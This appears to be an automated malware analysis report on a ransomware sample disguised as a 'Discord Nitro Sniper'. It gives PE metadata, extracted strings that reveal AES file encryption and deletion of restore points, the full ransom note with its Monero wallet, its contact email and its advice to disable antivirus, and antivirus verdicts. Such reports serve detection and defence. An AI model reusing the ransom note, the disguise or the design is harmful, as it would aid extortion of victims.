
PE Compile Time

2056-11-12 13:45:43

PDB Path

C:\Users\lucas\Desktop\Matryoshka\MatryoshkaWorker\Matryoshka\obj\Release\net40\NitroSnypa.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00025cb0 0x00025e00 7.65912132945
.rsrc 0x00028000 0x0000691c 0x00006a00 7.7979151126
.reloc 0x00030000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00028100 0x0000586c LANG_NEUTRAL SUBLANG_NEUTRAL PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON 0x0002d97c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0002d9a0 0x0000030a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0002dcbc 0x00000c5c LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
bKs`
b0s`
r$sc
000(
v4.0.30319
#Strings
<>9__5_0
<Matryoshka_Load>b__5_0
IEnumerable`1
Microsoft.Win32
UInt32
get_UTF8
<Module>
lbl_GUID
SetDeviceID
System.IO
lbl_ReadRU
get_IV
set_IV
pb_Matryoshka
lbl_Matryoshka
pnl_Matryoshka
get_Matryoshka
NitroSnypa
FromArgb
mscorlib
System.Collections.Generic
lbl_Read
Thread
Matryoshka_Load
add_Load
get_Red
add_TextChanged
txt_Wallet_TextChanged
add_SelectedIndexChanged
cb_Lang_SelectedIndexChanged
set_Enabled
set_FormattingEnabled
NewGuid
<IV>k__BackingField
<Key>k__BackingField
Clipboard
set_Mode
set_AutoScaleMode
set_SizeMode
PictureBoxSizeMode
PaddingMode
CipherMode
Decode
bytesToEncode
set_Image
set_InitialImage
AddRange
Enumerable
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
EncryptFile
set_BorderStyle
set_FormBorderStyle
set_FlatStyle
FontStyle
set_Name
DateTime
Combine
LocalMachine
System.Core
get_Culture
set_Culture
resourceCulture
get_InvariantCulture
ButtonBase
TextBoxBase
Dispose
EditorBrowsableState
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
AssemblyTitleAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyInformationalVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GetValue
SetValue
NitroSnypa.exe
set_Size
set_BlockSize
set_MinimumSize
set_AutoSize
set_ClientSize
set_KeySize
ISupportInitialize
cb_Lang
System.Threading
set_Padding
Encoding
System.Runtime.Versioning
ToString
GetString
disposing
System.Drawing
GetFolderPath
get_Length
length
RegistryKeyPermissionCheck
add_Tick
TTimer_Tick
add_Click
btn_CopyWallet_Click
TransformFinalBlock
set_Interval
lbl_GuidLbl
System.ComponentModel
Srclient.dll
ContainerControl
ListControl
Program
get_Item
System
SymmetricAlgorithm
Random
btn_Confirm
ICryptoTransform
get_MsgEn
resourceMan
TimeSpan
set_TextAlign
set_Icon
set_ShowIcon
GetExtension
Application
get_Location
set_Location
location
System.Globalization
System.Reflection
ControlCollection
ManagementObjectCollection
Exception
Button
lbl_SendTo
wb_HowTo
CultureInfo
pb_Monero
get_Monero
get_Tomato
Bitmap
set_TabStop
System.Linq
Crypt0r
set_DisplayMember
AesCryptoServiceProvider
IFormatProvider
SpecialFolder
sender
get_ResourceManager
ComponentResourceManager
EventHandler
System.CodeDom.Compiler
TTimer
lbl_Timer
IContainer
get_NitroSniper
WebBrowser
set_ForeColor
set_BackColor
set_UseVisualStyleBackColor
ManagementObjectEnumerator
GetEnumerator
.cctor
Cryptor
CreateDecryptor
CreateEncryptor
GenStr
System.Diagnostics
get_Seconds
System.Runtime.CompilerServices
GetInstances
System.Resources
Matryoshka.Matryoshka.resources
Matryoshka.Properties.Resources.resources
DebuggingModes
GetDirectories
Matryoshka.Properties
EncFiles
GetFiles
EnableVisualStyles
GetSubKeyNames
get_Minutes
encryptedBytes
ReadAllBytes
WriteAllBytes
GetBytes
EventArgs
get_Controls
get_Items
System.Windows.Forms
Contains
set_AutoScaleDimensions
ObjectGetOptions
get_Chars
get_Hours
ManagementClass
components
DelRestPoints
Exists
get_Days
Concat
Subtract
ParseExact
ManagementBaseObject
GetObject
lbl_Wallet
txt_Wallet
btn_CopyWallet
lbl_TimeLeft
EndInit
BeginInit
SetCompatibleTextRenderingDefault
DialogResult
System.Management
HorizontalAlignment
ContentAlignment
Environment
pnl_Payment
InitializeComponent
get_Current
SRRemoveRestorePoint
set_Font
GetPathRoot
ThreadStart
Convert
SuspendLayout
ResumeLayout
PerformLayout
MoveNext
System.Text
get_Text
set_Text
SetText
set_DocumentText
get_MsgRu
get_Now
set_TabIndex
get_SelectedIndex
MessageBox
PictureBox
set_MaximizeBox
ComboBox
TextBox
txt_WalletPay
get_Key
set_Key
CreateSubKey
OpenSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
GetEntryAssembly
set_ReadOnly
EncryptDirectory
Registry
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
Release
Discord Nitro Sniper
5.32.0.0
Nitro Snypa
NitroSnypa
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aBj
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{?a!S
uBgS\]
SBH~,y
S"d0KV:
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3afSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADP
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
lr%uuu
h`(Ic*
Sz&Oz6O
W^})<d(
+=O#:T
QzFN:L
c-=/%z
>GT^y)
0gk}w<
VYEC,I
V9EC+I
4lO=~
vW#/z/
R+ECLI
i~ECTI
mV%m=W
c%-'W}H
hs*iyE
Rn}Uwc~
3%Ic(o
^?Z^~V
_[_+D?3RI]
v}?v%o
S/}?\wH
ECjiQE
/Z(K%t
c[-XPp
?7?$ikE
0/)w/F
/7@Ts)/
8y<<XP]E
j(:TP=E
}-?7@Tk;v-v
}-?7@Tk)/
1/Co#7@
VxX-mw
CjiY}x
Qt8--;
jmxVvt
~c2:HP
_tH--+
jhxtDt
Vtx-]k
BtEE_+s+
CLm,7A
W4,K5v
|mW^t=
L4@K57
S4kHS(
D4HKS(:
\M4TKS
P8OHS)
Q4XKSi8
-M-/Co
lV4dKS
FQ4hKSk8
q4xKS.:
Bim}wY
Zhx\Ft
vKyq_4
)IQ^|>
(:XU]E
X5~crG
I[kxN{t
I[oxn{t
R^?PV
?G$][)wo
F?7$]{)w
~ax%Z$$-/7A$
Ton~Hu
[3<W7Z8$
E$ZP$M
A$]K'N
Zw$Zl$
0-)wOE
!Z|$iY
$IZM)w
^?O?VFk
-Iyq,Z
y=Z %I
~q|+Z(%I
z?ZB%I
|;ZF%I
}'ZR%I
w!Zj%I
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
twIDATx^
q<;W>}
ggM+< bY|
p_,WMY
?4mA]n{R
}"&''7
<Dre`D
foQ\eKU
.oA\eKY
B`A\eK]
j5&?)e
ok;Z>%
zttt+Kk
]-6>ii
[*_ii$A
kgL'-n
;kZ)P>gx
"vKoQ[g)
~@ n,o
-fo[ga[_
`QNd{Y
[L_jqg
;,,DD}
.?^*5
sc9ha{
:Gzw v
XL?ba{
hn%/lk[z
$/VLG,lO
|,{\`!\u)
mddd{Ke
K-lTJr
eFc:$o
f'kJ2tb
K~A&=6
"c(ViU
qN O,Nw
" '=A)
8G&''7
^600p?K
*N b</
WiN~u``
<div align="justify">
<h1>Ooops!!!</h1>
<b>You have been infected by Matryoshka Ransomware.</b>
<p>Read all instructions carefully to recover files.</p>
<h3>What is Matryoshka Ransomware?</h3>
Ransomware is a computer program that encrypts files with military grade cryptography algorithms.
This means you cannot decrypt it alone, you need creators of such virus to decrypt for you.
Matryoshka has infected you and your files are now encrypted. Good news! We <b>can decrypt</b> for you. That, however, comes with small price: <b>$75 (seventy five US dollars)</b>. Very cheap, yes? Other ransomwares charge up to $1000, we are being generous!
You are advised to pay the fee within 20 days of infection (as seen on left of window).
If demand is not met, all encrypted files are deleted <b>FOREVER</b>.
<h3>Things you must know</h3>
Only Matryoshka Team (
) can decrypt your files. Any attempt you do is futile.
<b>If you delete this program, you never recover files!!!</b>
Uninstall or stop your antivirus or it may remove Matryoshka and, by consequence,
your files. Immediately.
<h3>How to pay</h3>
You pay the fee using cryptocurrency. No worries, it is easy! We only accept
Monero for payment because is very private and your information is not leaked.
You can buy Monero on sites online, like Binance.
To buy cryptocurrency Monero (XMR), you need wallet. When buying Monero from
Binance for example it will create the wallet for you. The wallet is how we identify
your computer and unlock your files.
Go on Google to learn more of how to buy XMR (Monero).
<p>YOU MUST SEND PAYMENT TO THE WALLET BELOW:</p>
<p><b>47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4</b></p>
<h3>How are files unlocked</h3>
When you send payment, it takes a little time (around 30 minutes) to the Blockchain
to register it. You will then need to insert your wallet (is 95 characters long) in this program on the payment
field below, and press "CONFIRM". But be careful, if you specify wrong wallet, it will
be bad and you will not be able to recover your files! We have program running to check payments, when you confirm that you have sent it our server receives information and will
wait to see if payment is received.
Encryption keys are stored in our server, you do not have access. When payment is confirmed,
the program gets the key and performs decryption unlocking your precious files.
This program asks the server if payment is received every 10 minutes. If yes, then files
are recovered, decrypted, everything is fixed and this program is gone.
If you have any problem, email us at matryoshka.iosef@airmail.cc and we provide support.
<b>Only email if problem is with payment confirmation delay!</b>
</div>
)<div align="justify">
!!!</h1>
?</h3>
: <b>$75 (
)</b>.
1000
</b>.</p>
!</b>
Monero
Monero
Binance.</p>
Monero (XMR),
Monero
Binance,
Google,
XMR (Monero).</p>
<p><b>47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4</b></p>
matryoshka.iosef@airmail.cc,
</div>A
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{?a!S
uBgS\]
SBH~,y
S"d0KV:
RSDSxH
C:\Users\lucas\Desktop\Matryoshka\MatryoshkaWorker\Matryoshka\obj\Release\net40\NitroSnypa.pdb
SHA256
_CorExeMain
mscoree.dll
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{?a!S
uBgS\]
SBH~,y
S"d0KV:
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
SOFTWARE
Matryoshka
SOFTWARE\Matryoshka
yyyy-MM-dd HH:mm:ss
C:\MatryoshkaKillswitch.txt
.matryoshka
.config
.jsonl
.class
.pickle
.vegas
.skript
.audacity
\\.\root\default
systemrestore
sequencenumber
Copied to clipboard.
pb_Matryoshka
pnl_Matryoshka
Microsoft Sans Serif
lbl_GUID
Segoe UI
lbl_GuidLbl
(GUID):
lbl_Timer
20d 23h 59m 59s
lbl_TimeLeft
(time left):
lbl_Matryoshka
English
cb_Lang
pnl_Payment
txt_WalletPay
47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4
btn_CopyWallet
(Copy)
lbl_SendTo
Send payment to wallet:
btn_Confirm
(Confirm Payment)
lbl_Wallet
(Wallet):
txt_Wallet
lbl_ReadRU
lbl_Read
Read Instructions Above To Pay
pb_Monero
wb_HowTo
$this.Icon
Matryoshka.Properties.Resources
Monero
NitroSniper
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Welcome to Nitro Snypa.
The application has been attached to Discord and is now running in the background looking for Nitro codes.
You will be informed if any valid code is found as it is instantly claimed.
Nitro Snypa v5.32 beta
$this.Icon
Matryoshka
Monero
NitroSniper
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Discord Nitro Sniper
CompanyName
FileDescription
NitroSnypa
FileVersion
5.32.0.0
InternalName
NitroSnypa.exe
LegalCopyright
OriginalFilename
NitroSnypa.exe
ProductName
Nitro Snypa
ProductVersion
Assembly Version
5.32.0.0
Antivirus Signature
Bkav Clean
Elastic Clean
MicroWorld-eScan Gen:Heur.Ransom.HiddenTears.1
CMC Clean
CAT-QuickHeal Clean
Qihoo-360 Clean
McAfee Artemis!61FCCC142E2B
Cylance Unsafe
VIPRE Clean
AegisLab Trojan.MSIL.Encoder.j!c
Sangfor Ransom.MSIL.Encoder.gen
K7AntiVirus Trojan ( 0052dbd31 )
BitDefender Gen:Heur.Ransom.HiddenTears.1
K7GW Trojan ( 0052dbd31 )
Cybereason malicious.42e2bb
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Filecoder.IX
APEX Clean
Avast Win32:Malware-gen
ClamAV Clean
Kaspersky HEUR:Trojan-Ransom.MSIL.Encoder.gen
Alibaba Trojan:MSIL/Filecoder.8d8d23c6
NANO-Antivirus Clean
ViRobot Clean
Rising Ransom.Encoder!8.FFD4 (CLOUD)
Ad-Aware Gen:Heur.Ransom.HiddenTears.1
Emsisoft Gen:Heur.Ransom.HiddenTears.1 (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Ransom_Encoder.R002C0WEG21
McAfee-GW-Edition Artemis!Trojan
FireEye Gen:Heur.Ransom.HiddenTears.1
Sophos Mal/Generic-S
SentinelOne Clean
GData Gen:Heur.Ransom.HiddenTears.1
Jiangmin Clean
Webroot Clean
Avira TR/Ransom.tiwaq
MAX malware (ai score=100)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Ransom.HiddenTears.1
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Ransom.MSIL.Encoder.gen
Microsoft Ransom:MacOS/Filecoder
Cynet Malicious (score: 99)
AhnLab-V3 Trojan/Win.Generic.C4474413
Acronis Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Malwarebytes MachineLearning/Anomalous.96%
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Ransom_Encoder.R002C0WEG21
Tencent Clean
Yandex Clean
Ikarus Win32.Outbreak
eGambit Clean
Fortinet MSIL/Filecoder.IX!tr
BitDefenderTheta Gen:NN.ZemsilF.34690.lm0@aa70tTd
AVG Win32:Malware-gen
Paloalto generic.ml
CrowdStrike win/malicious_confidence_70% (W)
MaxSecure Clean